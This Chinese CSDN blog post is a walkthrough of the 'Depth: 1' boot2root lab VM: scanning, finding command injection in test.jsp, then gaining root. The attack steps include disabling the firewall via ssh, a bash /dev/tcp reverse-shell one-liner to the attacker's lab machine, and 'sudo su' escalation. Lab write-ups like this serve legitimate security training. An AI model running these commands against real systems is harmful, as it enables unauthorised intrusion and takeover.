Depth: 1

于 2024-09-29 17:04:12 发布
阅读量420 收藏 16
点赞数 10
文章标签: linux 运维 服务器 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78815619/article/details/142639057
版权

靶机描述

Many times while conducting a pentest, I need to script something up to make my life easier or to quickly test an attack idea or vector. Recently I came across an interesting command injection vector on a web application sitting on a client's internet-facing estate. There was a page, running in Java, that allowed me to type arbitrary commands into a form, and have it execute them. While developer-provided webshells are always nice, there were a few caveats. The page was expecting directory listing style output, which was then parsed and reformatted. If the output didn't match this parsing, no output to me. Additionally, there was no egress. ICMP, and all TCP/UDP ports including DNS were blocked outbound.
很多时候,在进行渗透测试时,我需要编写一些脚本来使我的生活更轻松,或者快速测试攻击想法或向量。最近,我在一个客户端面向互联网的网页应用程序上遇到了一个有趣的命令注入向量。有一个页面,在Java中运行,允许我在表单中输入任意命令,并让它执行它们。虽然开发人员提供的webshell总是很好,但也有一些警告。该页面需要目录列表样式的输出,然后将其解析并重新格式化。如果输出不匹配这个解析,没有输出给我。另外,没有出口。所有TCP/UDP端口(包括DNS)都被阻止出站。

I was still able to leverage the command injection to compromise not just the server, but the entire infrastructure it was running on. After the dust settled, the critical report was made, and the vulnerability was closed, I thought the entire attack path was kind of fun, and decided to share how I went about it. Since I enjoy being a free man and only occasionally visit prisons, I've created a simple boot2root style VM that has a similar set of vulnerabilities to use in a walkthrough.
我仍然能够利用命令注入不仅危害服务器,而且危害它运行的整个基础设施。尘埃落定后,关键报告被提出,漏洞被关闭,我认为整个攻击路径是一种乐趣,并决定分享我是如何做到这一点的。因为我喜欢做一个自由的人,只是偶尔访问监狱,我已经创建了一个简单的boot2root风格的VM,它有一组类似的漏洞,可以在演练中使用

环境搭建

靶机

Depth: 1

NAT模式 192.168.119.151

攻击机

kali

NAT模式 192.168.119.128

详细步骤

1.主机发现

靶机开机已经告诉我们IP地址了,不过我们还是扫描确认一下

2.端口扫描

nmap -p- -A -sV -Pn 192.168.119.151

 开启了8080http端口

3.目录扫描

dirsearch -u 192.168.119.151:8080

4.Web访问

浏览器访问192.168.119.151:8080

这是一个tomcat网页,拼接访问/manager/,弹出个登录框

http://192.168.119.151:8080/manager

拼接访问/test.jsp,得到一个输入框

5.漏洞挖掘

根据提示,输入ls -l /tmp,命令执行成功

这里能执行命令,尝试在这里直接反弹shell,失败了

尝试一下能不能执行其他命令

ls -l /home #查看家目录

接着来查看一下进程

ps -aux

接着看一下/etc目录,看看是否存在防火墙

ls -l /etc/

尝试关闭防火墙

ssh bill@localhost sudo ufw disable

执行成功

6.漏洞利用

接下来尝试反弹shell,kali开启监听

nc -lvvp 6666

然后执行命令

ssh bill@localhost bash -i >& /dev/tcp/192.168.119.128/6666 0>&1

成功getshell

7.权限提升

尝试直接切换root

sudo su

成功

0Deww
关注
深度学习论文: Depth Anything V2
mingo_敏
06-21 1579
Depth Anything V2通过三项关键实践实现了更精细、更稳健的单目深度估计:首先,采用合成图像替代真实标记图像,以克服标签噪声和细节缺失;其次,扩大教师模型的容量,提升性能;最后,利用大规模伪标签真实图像训练学生模型。与基于Stable Diffusion的模型相比,V2在效率和准确性上均大幅提升,速度快10倍以上。此外,V2提供了多种规模的模型,并支持一个多功能评估基准,以促进未来研究。
《HR-Depth:High Resolution Self-Supervised Monocular Depth Estimation》论文笔记
m_buddy的博客
04-04 1321
参考代码:HR-Depth 1. 概述 介绍:这篇文章研究的是如何在自监督场景下预测得到细节更加丰富的深度结果,在现有的自监督深度估计网络中往往是通过增大输入图像尺寸、3D卷积(如,PackNet-SFM)或是分辨率通道编码(如,nn.PixelShuffle())的方式。这篇文章比较系统探究了自监督深度估计中影响深度估计效果的原因,在文章中将其归纳为两点原因:语义信息与空间信息的不足,它俩分别侧重描述的是物体的类别与边界。对此文章提出了两点改进的点: 1)对原本shortcut连接进行优化,获取更好的高
... used greatest stack depth: xxx bytes left
furongwei123的博客
01-24 1774
配置“CONFIG_DEBUG_STACK_USAGE”, 将让内核监视栈的使用(打印最大栈深度),并通过sysrq按键输出一些统计信息。 #ifdef CONFIG_DEBUG_STACK_USAGE static void check_stack_usage(void) { static DEFINE_SPINLOCK(low_water_lock); static int lowest_to_date = THREAD_SIZE; unsigned long free; free = sta
论文笔记:HR-Depth:High Resolution Self-Supervised Monocular Depth Estimation
blueag1e的博客
02-07 961
HR-Depth:High Resolution Self-Supervised Monocular Depth Estimation
Scipy读取wav格式音频报错:Unsupported bit depth: the wav file has 24-bit data
一听音频技术
12-17 1206
代码 from scipy.io import wavfile sr, y = wavfile.read('audio/XXX.wav') 错误信息 ~/anaconda3/lib/python3.7/site-packages/scipy/io/wavfile.py in read(filename, mmap) 255 if bit_depth not in (8, 16, 32, 64, 96, 128): 256
Recurrence along Depth: Deep Convolutional Neural Networks with Recurrent Layer Aggregation阅读笔记
风行
11-12 3701
(一) Title 论文地址:https://arxiv.org/abs/2110.11852 (二) Summary 研究背景 本文内容 本文进一步探讨了layer aggregation的问题,使得previous layer的信息能够更好地服务于current layer的特征提取。 通过引入recurrent layer aggregation(RLA),充分利用CNNs layers的顺序结构,帮助学习图像中的structural information. (三) Research Obje
InvalidArgumentError: input and filter must have the same depth: 240 vs 128
weixin_42631693的博客
10-20 2092
我得解决办法: 1.Linux系统,将 ~/.keras/keras.json中的 "image_data_format": "channels_first" 将channels_first改为channes_last 2.Windows系统中,C:\user\xxx\.keras\kera.json "image_data_format": "channels_first" 将channel...
《21个项目玩转深度学习》第四章问题总结--Python3.6与2.7的兼容问题及其他小问题
GISerLS的博客
06-29 1103
1.'utf-8' codec can't encode character '\udcd5' in position 1946: surrogates not allowed 直接运行load_inception.py,出现如下报错: File "D:\Anaconda3\lib\site-packages\zmq\utils\jsonapi.py", line 43, in dumps s = s.encode('utf8') UnicodeEncodeError: 'utf-8'
MindSpore报错RuntimeError:Exceed function call depth limit 1000, (function call depth: 1001...
weixin_45875914的博客
04-02 1813
1 报错描述 1.1 系统环境 Hardware Environment(Ascend/GPU/CPU): GPU Software Environment: – MindSpore version (source or binary): 1.6.0 – Python version (e.g., Python 3.7.5): 3.7.6 – OS platform and distribution (e.g., Linux Ubuntu 16.04): Ubuntu 4.15.0-74-gener
Dockerfile: max depth exceeded
Game_Software的博客
12-10 6110
docker build 项目出现max depth exceeded原因和解决方法 docker system prune -a 引用:docker-compose: max depth exceeded - Stack Overflowhttps://stackoverflow.com/questions/59992469/docker-compose-max-depth-exceeded
coverage-depth:使用Apache Spark生成基因组覆盖深度直方图
05-12
覆盖深度 分析一个或多个BAM文件中的覆盖率,可以选择与“间隔文件”(例如.bed捕获套件.bed ) .bed 。 该工具计算有关一组或两组读数(例如.bam )的覆盖深度统计信息,还可以选择获取间隔文件(例如.bed ,表示...
fast-depth:ICRA 2019“ FastDepth
03-11
快速深度 此为MIT的项目提供了经过训练的模型和评估代码。 内容 要求 在具有CUDA GPU的计算机上安装 。 我们的代码是在运行PyTorch v0.4.1的系统上开发的。 安装格式库。 预处理数据集中的文件为HDF5格式。...
vid2depth:这是与tensorflowmodels分开的vid2depth,一些行被注释或更改以成功推断
04-30
vid2depth 使用3D几何约束从单眼视频进行深度和自我运动的无监督学习 Reza Mahjourian,Martin Wicke,Anelia Angelova CVPR 2018 ... # git clone --depth 1 https://github.com/tensorflow/models.
Linux 安装redis主从模式+哨兵模式3台节点
最新发布
一千个读者就有一千个哈姆雷特
09-27 325
Linux 安装redis主从模式+哨兵模式3台节点
linux】gcc makefile
Quietcoder的博客
09-24 1081
在静态链接中,链接器(如GNU的。
[Linux]:线程(一)
Bettysweetyaaa的博客
09-26 703
想深入了解线程吗?本文将为你详细解读线程的概念、优缺点、异常及用途,还介绍了 Linux 中线程的控制方法。快来阅读,提升你的编程技能,探索多线程的奥秘!
linux 源代码编译
Lxn2zh的博客
09-27 1209
有时候会在linux上下载源码包,然后进行编译成可执行的文件,这个过程需要经过configure、make、make install、make clean四个步骤。configure 为这个程序在当前的操作系统环境下选择合适的编译器和环境参数来编译该代码。make install 将已编译好的可执行文件安装到操作系统指定或默认的安装目录下。make 对程序代码进行编译操作,会将源码编译成可执行的目标文件。make clean 删除编译时临时产生的目录或文件。
Linux 网络安全守护:构建安全防线的最佳实践
weixin_62641226的博客
09-23 1011
通过定期更新系统、强化用户权限管理、配置防火墙、使用SSH安全连接、定期备份数据、监控系统日志以及安装安全工具,用户可以有效提升Linux系统的安全性,构建坚固的网络安全防线。Linux系统通常内置了防火墙工具,如`iptables`和`firewalld`。用户应根据实际需求,设置合适的规则,限制不必要的端口和服务。可以使用`rsync`、`tar`等工具进行备份,确保在发生安全事件时能够快速恢复。此外,定期审查用户账户和权限,及时删除不再使用的账户,确保只有必要的用户能够访问系统。
Linux ping c实现
xuyun0565的专栏
09-24 393
linux下ping程序的c实现。
input depth must be evenly divisible by filter depth: 1 vs 3
03-30
This error occurs when you try to access the `trainable_variables` attribute of the TensorFlow module, but it does not exist. This attribute is used to get all the trainable variables in a TensorFlow graph. It is commonly used in machine learning models to get the weights and biases of the neural network layers for training and optimization. To fix this error, make sure you have imported the `tensorflow` module correctly and that it is up-to-date. Also, check that you are trying to access the attribute on the correct object, such as a TensorFlow model or optimizer.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值